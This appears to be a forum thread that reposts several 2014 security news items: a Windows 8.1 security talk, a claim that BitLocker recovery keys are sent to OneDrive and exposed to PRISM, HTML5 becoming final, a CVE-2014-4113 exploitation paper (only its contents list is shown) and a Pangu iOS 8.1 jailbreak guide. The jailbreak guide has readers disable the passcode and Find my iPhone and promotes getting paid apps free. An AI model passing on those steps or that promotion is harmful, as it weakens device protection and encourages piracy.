[h=1]Windows 8.1: Black Belt Security[/h] Date: October 31, 2014 from 10:15AM to 11:30AM Day 4 Hall 8.1 Room G WIN-B318 Speakers: Sami Laiho Download [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality MP4 file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality MP4 file. If you have a Windows Phone, iPhone, iPad, or Android device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 66.7 MB Mid Quality MP4 (Windows Phone, HTML5, iPhone) [h=3]File size[/h] 285.9 MB High Quality MP4 (iPad, PC, Xbox) MP4 (iPhone, Android) Learn why and how you should leverage the Windows 8.1 security technologies like BitLocker, AppLocker, UAC, Least Privilege and Remote Desktop Restricted Admin -mode. In this 75 minute bombardment against the Windows OS you will see scary hands-on examples on how to break into an unprotected OS. If you still need to convince your boss to give you budget for implementing more security measures you don't want to miss this! Sami's black belt session was evaluated as the best session in TechEd North America 2014, TechEd Australia 2013 and as the best session by an external speaker in TechEd Europe 2013. Sursa: Windows 8.1: Black Belt Security | TechEd Europe 2014 | Channel 9

1 November 2014 Microsoft OneDrive in NSA PRISM Tweet A sends: 1) Bitlocker keys are uploaded to OneDrive by 'device encryption'. "Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected. ... If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created." What's New in BitLocker in Windows and Windows Server 2) Device encryption is supported by Bitlocker for all SKUs that support connected standby. This would include Windows phones. "BitLocker provides support for device encryption on x86 and x64-based computers with a TPM that supports connected stand-by. Previously this form of encryption was only available on Windows RT devices." What's New in BitLocker in Windows and Windows Server 3) The tech media and feature articles recognise this. "... because the recovery key is automatically stored in SkyDrive for you." Surface, BitLocker, and the future of encryption | ZDNet 4) Here's how to recover your key from Sky/OneDrive. "Your Microsoft account online. This option is only available on non-domain-joined PCs. To get your recovery key, go to ...onedrive.com..." BitLocker recovery keys: Frequently asked questions - Windows Help 5) SkyDrive (now named OneDrive) is onboarded to PRISM. (pg 26/27) http://hbpub.vo.llnwd.net/o16/video/olmk/holt/greenwald/NoPlaceToHide- Documents-Uncompressed.pdf Sursa: Microsoft OneDrive in NSA PRISM

After eight years of work, HTML5 is finalized HTML5 was designed to move the Web from serving static documents to becoming a full-fledged platform for building apps By Joab Jackson After nearly eight years of work, the World Wide Web Consortium (W3C) has finalized the HTML5 standard, bringing the basic Web technology firmly into the era of mobile devices and cloud-driven rich Internet applications. "HTML5 brings the next generation of the Web," said W3C CEO Jeff Jaffe. "It wasn't so long ago that the Web was about browsing static documents. Today's Web is a much richer platform." Although Web and mobile developers have been using parts of the HTML5 specification for several years, the finished specification -- which the W3C calls a recommendation -- ensures developers that the code they develop for the Web will work going forward. "We're now at a stable state that everyone can build to the standard and be certain that it will be implemented in all browsers," Jaffe said. "If we didn't have complete interoperability, we wouldn't have one Web." In 1989, physicist Tim Berners-Lee created the first version of the HTML as a way to format and link together written materials so they could be accessed over the Internet. In the years since, the resulting World Wide Web has come to serve billions of users all manner of content, from movies and music to full-fledged applications. The HTML5 final recommendation, over 1,370 pages in length, addresses this complex environment. HTML5 provides a way to serve multimedia content and application functionality without relying on proprietary plug-ins to the browser. It also addresses a wide range of other uses for the Web, such as delivering scalable vector graphics (SVG) and math annotations (MathML). Today, HTML5 provides a "write-once, run-anywhere" cross-platform alternative to writing applications for multiple mobile platforms, such as Android and Apple iOS devices, Jaffe said. About 42 percent of mobile application developers are using HTML, along with JavaScript and Cascading Style Sheets (CSS) to build their apps, according to a 2014 survey from mobile analysis firm Vision Mobile. The W3C hopes the specification will be a cornerstone for future work in what it calls the Open Web Platform, an even richer set of standards for building cross-platform vendor neutral online applications. Moving froward, the W3C is developing specifications for real-time communications, electronic payments and application development. It is also creating a set of safeguards for privacy and security. Ian Hickson, now employed at Google, served as the principal architect of the HTML5 specification, and engineers at Microsoft, IBM and Apple served as co-chairs for the working group. Over 45,000 emails were exchanged when drafting the document, from representatives of 60 companies. Sursa: After eight years of work, HTML5 is finalized | Computerworld

Exploiting CVE-2014-4113 on Windows 8.1 October 31, 2014 Moritz Jodeit <moritz@jodeit.org> Table of Contents 1 Introduction ..................................................................................................................................... 3 2 Vulnerability Details ........................................................................................................................ 3 3 Exploitation on Windows 8.1 .......................................................................................................... 4 3.1 Crafting the win32k!tagWND structure .................................................................................. 4 3.2 Finding an overwrite target ..................................................................................................... 6 3.3 Combining all steps ................................................................................................................. 8 4 Conclusion ....................................................................................................................................... 9 Download: http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf

Easy Jailbreak 8.1 Untethered Guide – One Click Cydia Bundle Pangu 1.1: All iOS 8 Devices Posted in iPhone 5s, iPhone 6 Plus, Jailbreak 8.1 - 31 October 2014 - 28 comments How to Jailbreak 8.1 Untethered iOS 8 via Pangu 1.1 One-Clic Cydia Bundle on iPhone 6 Plus, 6 iPhone 5S, 4S and iPad Air 2, Mini 3, 4 – Pangu is on fire, they’ve done it again, we now have a simplified jailbreak 8.1 solution. Today, ensuing a plethora of recent developments and releases, the Pangu Team released a near-perfect iteration of their Pangu for iOS 8 utility that’s capable of providing an Untethered jailbreak on 8.1 for all iPhone, iPad and iPod touch models. While the group of Chinese-based hackers previously issued the first iteration of their jailbreak tool for iOS 8.1 last week, said tool was mostly intended for jailbreak tweak developers and advanced users – now, with today’s release, Pangu has pushed out a utility intended for the masses. The new Pangu 1.1 jailbreak iOS 8.1 tool finally comes bundled with Cydia (the graphical user interface, and distribution platform, for third-party iOS tweaks that has effectively monopolized the jailbreak scene). Jailbreaking 8.1 on the iPhone 6 Plus, iPhone 6, iPhone 5s, iPhone 5c, iPhone 4s, the new iPad Air 2 and iPad mini 3, the original iPad Air, the iPad Mini 2 with Retina display, iPad 4, the original iPad mini, iPad 3, iPad 2 and, last but certainly not least, the 5th generation iPod touch on 8.0 through 8.1 has never been easier! Continue reading past the break for complete instructions on how to jailbreak any of the aforementioned iDevices running 8.1 completely Untethered. How To Jailbreak 8.1 Untethered iPhone 6 Plus, 6, 5S, iPad Air 2, Mini 3, 4 And iPod Touch This guide will assist you in not only jailbreaking iOS 8.x, but also installing Cydia in an all-new, one-shot method employing the use of the Pangu Team’s updated Pangu 1.1 utility. As previously stated, the newest iteration of the Pangu jailbreak 8.1 utility supports the following iDevice models running iOS 8 through 8.1: iPhone 6 Plus iPhone 6 iPhone 5s, 5c, 5, iPhone 4S iPad Air 2, 1 iPad Mini 3, 2, 1 iPad 4, 3, as well as the iPad 2 iPod touch 5th generation Jailbreak iOS 8 – 8.1 Requirements: All iPhone, iPod Touch And iPad Models Before proceeding any further with this , ensure that you have, and complete, the following as all are necessary to ensure the success of an untethered jailbreak on Apple’s latest public firmware(s). Any of the above iDevices running iOS 8 through 8.1 that were not updated through the Setting app’s OTA (over-the-air) update option. If you performed an OTA update, follow the below prerequisite instructions. Also, ensure that your device does not have a passcode set or Find my iPhone enabled, both of which can be set back post jailbreak – this is very important. A Windows-based PC – while Mac OS X isn’t officially supported Pangu should update their utility soon. For the time being, either create a Windows partition using Boot Camp Assistant or setup a virtual machine; numerous tutorials can be found online for either option. The Latest version of iTunes, as well as the all-new 1.1 Pangu Windows jailbreak iOS 8.1 utility, both of which can be found, and downloaded, from the download section below. iOS 8.1 Jailbreak OTA And Prerequisite Instructions, Which Are Crucial Also, as alluded to in the second step, if you updated your device through Apple’s OTA update ability or you want to ensure that you don’t encounter issues (and you prefer to err on the side of caution) follow the below steps to guarantee a successful jailbreak. 1. Plug your device into your computer via USB and initiate a complete backup inside iTunes. 2. Restore to a clean build of iOS 8.1 by clicking the option to perform a restore. 3. Jailbreak 8.1 following this guide and, once you’ve jailbroken successfully, restore from the backup that you created when following the first step. Now, without further ado, we can continue with the steps required to jailbreak iOS 8.1 on any iPhone, iPad or iPod touch that’s able to run the latest firmware. How To Jailbreak 8.1 Untethered With Pangu: All iOS 8 Devices – Written And Video Tutorials Step 1. In addition to, and beyond, Pangu for iOS 8, download the latest version of iTunes from our download section, listed below, to ensure that you’ve obtain genuine Pangu and Apple software, respectively. Step 2. Following your download of Pangu for iOS 8 version 1.1, plug your iPhone, iPad or iPod into your PC via Apple’s standard Lightning USB cable, or 30-pin connector cable for the iPhone 4s and older iPad models. Step 3. Enter Airplane mode, a step that is fundamental to the jailbreak, and click the blue button at the bottom of the Pangu utility to continue on to jailbreak 8.1. Step 4. Conditional - if Pangu gets stuck towards the end of the on-screen progress bar, find the ‘Pangu New’ app on your device’s springboard, launch it and verify the developer. Upon a successful load, the Pangu utility will proceed to jailbreak iOS 8.1 without further interruption. Step 5. Leave your iPhone, iPad or iPod touch connected to your computer, don’t interface with it, and, once your device reboots, you’ll be greeted with a welcome sight in what was previously a blank space on your device’s springboard: Cydia. Congratulations, after following, and completing, five simple and easy-to-unsderstand steps, you’ve successfully jailbroken your iPod touch, iPhone or iPad running iOS 8 through 8.1! Also, while you’re well on your way to enjoying the countless benefits of jailbreaking, avoid the installation of incompatible tweaks, and those that have yet to be updated for support on iOS 8.x, as they’re unquestionably harmful. Jailbreak iOS 8.1 Pangu Download Section: Pangu 1.1 1. Pangu 8.1 Jailbreak download for Windows-based PC users. 2. Apple’s latest iteration of iTunes, which is required for Pangu to recognize your device and, in turn, jailbreak. 3. The iOS 8.1 IPSW, which should be used to restore to if you wish to ensure the success of your jailbreak on iOS 8. Finally, as a concluding note, for those of you interested in earning paid iOS 8.1 App Store apps for Free, we advise checking out FreeAppLife inside of Safari on your iDevice, regardless of its jailbreak status. Thanks for both reading and following our detailed UnTethered jailbreak 8.1 and iOS 8 tutorial. Don’t forget to subscribe to our Jailbreak Evasion 8.1 UnTethered news feed, like us on Facebook, follow us on Twitter and add us on Google+ to be expediently notified when we publish future articles concerning iOS 8.1, new iterations of Apple’s latest firmware, as well as future updates to the Pangu Untethered 8.1 jailbreak utility. Sursa: Easy Jailbreak 8.1 Untethered Tutorial With Cydia - One-Click Pangu